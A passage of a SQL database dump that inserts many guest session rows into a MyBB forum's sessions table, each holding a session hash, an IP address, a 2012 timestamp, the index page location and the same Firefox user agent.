'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e4b23225532eba0724e456c19eb065bf', '0', '239.60.32.186', '1352772198', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2afeff1d4880ea1c2b4646638f363eb3', '0', '186.199.42.162', '1352772200', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aaeb026f7082afad369edef5ddd272b1', '0', '195.178.140.64', '1352772200', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('59021f2f8d98a15a946b45ee3cd6c87c', '0', '181.166.77.82', '1352772201', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('443a1c859d4e628443b1087300900bf9', '0', '111.109.102.56', '1352772202', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5ea782fe07b30ccecbcd2f826554e76', '0', '184.203.54.247', '1352772202', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a105da4eca488fb5fa7a8f4e70bb4a34', '0', '238.118.199.52', '1352772203', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0366ec97739205e8dbadc7fd9c25a0a3', '0', '138.27.233.17', '1352772203', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d69307ffdfacae3d7672c5fc9bcd16cc', '0', '185.119.44.202', '1352772204', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('500f718133b2f71deb597a5c5a16dd32', '0', '120.130.70.229', '1352772205', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('30d0943fad1c1b19fa382075b14c8592', '0', '195.40.152.65', '1352772205', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13c5feed5f40d1ccf497cec7ac7e56c8', '0', '148.211.113.97', '1352772205', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a5e58ceedde7efc7e6e6c6416089778', '0', '168.91.39.76', '1352772206', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fdac17753c251e6e8e9a005ceaa69ab0', '0', '177.227.54.76', '1352772206', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eb64f23f823b607a3d7422abab66918e', '0', '188.182.14.87', '1352772208', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b4ed34d057f01f9039588d45bc38341', '0', '230.195.13.212', '1352772209', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('157a6fe1a8ed88b252b5dfb595795a61', '0', '242.144.155.0', '1352772209', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('63ae0e9261db7ba1dccd9e575cf26c33', '0', '232.44.5.145', '1352772210', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c733df6976e7b8e328109c7714af21c3', '0', '120.118.225.232', '1352772210', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7a174ec8aa379beaa2b9ae25de983352', '0', '23.223.134.228', '1352772212', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8e707a5faaff224e5bcbaa63c7f3c03', '0', '201.77.249.106', '1352772213', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ecb058c96070262263887b6ffc657aa', '0', '76.205.5.144', '1352772214', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2ef0bd0e24307f15142923508969b747', '0', '200.176.255.15', '1352772214', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c1c3b84055a34c9d9895259b9ba230e6', '0', '95.15.254.162', '1352772215', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b180e369e5a23a293d1ad68927475d5f', '0', '216.235.115.115', '1352772215', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a3d35a544683093e4a021671618f9e8a', '0', '41.103.96.87', '1352772216', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96bb7560566378439f83605b34294419', '0', '55.164.186.247', '1352772217', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c1142c64435a69386b56e6b7171f7637', '0', '64.46.34.198', '1352772218', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab462c5a9fc86919556cf031ab1d4605', '0', '123.184.69.109', '1352772219', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9391f91b449ff1475e7aff29cb593a2f', '0', '134.205.112.150', '1352772220', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5d98e90bfc06b60b34fbf4e2a6daa425', '0', '128.152.178.112', '1352772221', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c624fc100d228dfe8a01c187eb6cfb73', '0', '83.74.126.92', '1352772222', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('838fd955ea6a505fbac8acd97fb08355', '0', '238.245.75.205', '1352772222', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('348dee4aa432ddfeb89c813b1792c6f6', '0', '17.200.73.144', '1352772223', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('95f5bec36d9cafc34045d0f8875cb48f', '0', '211.236.63.202', '1352772224', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('970d6d86fb7728f1aead333177bce57a', '0', '130.137.213.227', '1352772224', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a357ed8fe2b8add32f9b1e71957b4588', '0', '219.50.48.147', '1352772225', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69a479b782a30f63b11a7e182be8babb', '0', '126.114.209.201', '1352772225', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5b2228e017d059044fa6407a9f09337e', '0', '98.235.5.65', '1352772226', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9d973b4a68e60e5ff3c2c2635dc19561', '0', '110.140.244.144', '1352772227', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8d271ad5833edcce853b0405f517533', '0', '168.102.155.115', '1352772228', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5453e5f96fc5d55b91a352d8d23b5435', '0', '229.71.69.221', '1352772229', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2979346cff18b25895f010654bbf3288', '0', '208.9.150.151', '1352772229', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d14dac6a3608f5d2a4c0b64d7372067c', '0', '107.130.155.77', '1352772230', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e22edf28d386ad2c34db329998cae8bc', '0', '114.188.87.102', '1352772231', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('739368f3e6bedf813371b64f896cb1e7', '0', '35.182.14.9', '1352772232', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aa325d517bfcc95b82d650c75820b8ed', '0', '177.114.51.233', '1352772232', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f21c9842dabec011a35008a7e0f6582e', '0', '91.94.200.118', '1352772233', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c4fccb0cd1b6e3157846114e8883853', '0', '127.112.95.218', '1352772234', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5c53cb807e323a30388a3c7a0d8dfeb', '0', '99.1.244.94', '1352772234', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00649b6a660ba0833875488119e54551', '0', '82.184.80.238', '1352772235', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a513e78f6a1d5e82210250dd39df02fa', '0', '185.162.137.225', '1352772236', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('851f3711b23494c98d74b9a60fc88920', '0', '146.67.118.27', '1352772236', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a6a3a34a18bcfa0d781d5411551cebd0', '0', '43.86.37.48', '1352772237', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f29c7b141cfe564171f55b4c741f3605', '0', '240.112.221.158', '1352772238', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f7ca3a0ccc27640eef2a123a63d62f3a', '0', '49.242.54.227', '1352772238', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a2c78941d38a970f540cbef07fef115a', '0', '128.73.11.81', '1352772239', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2703f02a05157eb6bcb2907112bbf00d', '0', '81.43.190.104', '1352772240', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ae9d970a2a927379071b0efc788613c', '0', '46.201.72.241', '1352772240', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3692b0515d46f89107bf59e22eb428d9', '0', '188.125.5.136', '1352772241', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('64289a07603ad67dd5db756a51204416', '0', '205.110.248.243', '1352772242', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07145e495512a8ec5ce40ebbc5bf4793', '0', '88.161.59.9', '1352772243', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('95081f06c98e70228c4ad8e86125e072', '0', '114.173.210.9', '1352772243', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf0d9396bc3d3a5db1575e23a082eba4', '0', '42.87.151.215', '1352772244', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('319f74021320530d917c27d7c334cc0c', '0', '30.199.24.69', '1352772245', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7e8ee7679c795fbbf987b1dcae63c30d', '0', '174.216.207.233', '1352772245', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24a4f0e7156964f53f30428a33eec5e0', '0', '92.72.218.147', '1352772246', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb79955aa9f9e84273cb6977bd31a9a2', '0', '144.86.163.125', '1352772247', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('047c5315909516831b1b501913d7c019', '0', '1.139.119.216', '1352772248', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79e37af506c5f36d4874bf367e062df7', '0', '245.31.61.31', '1352772248', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7a90954b483a850e10e4301e154c123e', '0', '164.78.189.178', '1352772249', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43f7a268f44a62842071c0d915866e5c', '0', '240.127.169.26', '1352772250', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5f9fdfd23c1aa94d8b7127536ea2b7f', '0', '31.15.225.224', '1352772250', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('621e5f3f90006b1064704c17e77b628d', '0', '45.79.97.93', '1352772251', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d6ecd4a5fcc56548860335d023edaab', '0', '241.188.216.93', '1352772252', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff0aff6c7e635e7edbd679ec52ad4f90', '0', '54.119.211.188', '1352772252', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a7a0634c85b37cb6c2dc189a47a75de', '0', '47.82.34.178', '1352772253', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ac35c96ba985408294ddb05947d534b', '0', '147.177.203.163', '1352772254', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('930ce1f469d973bc1f5575779bed2e91', '0', '24.78.18.48', '1352772254', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, 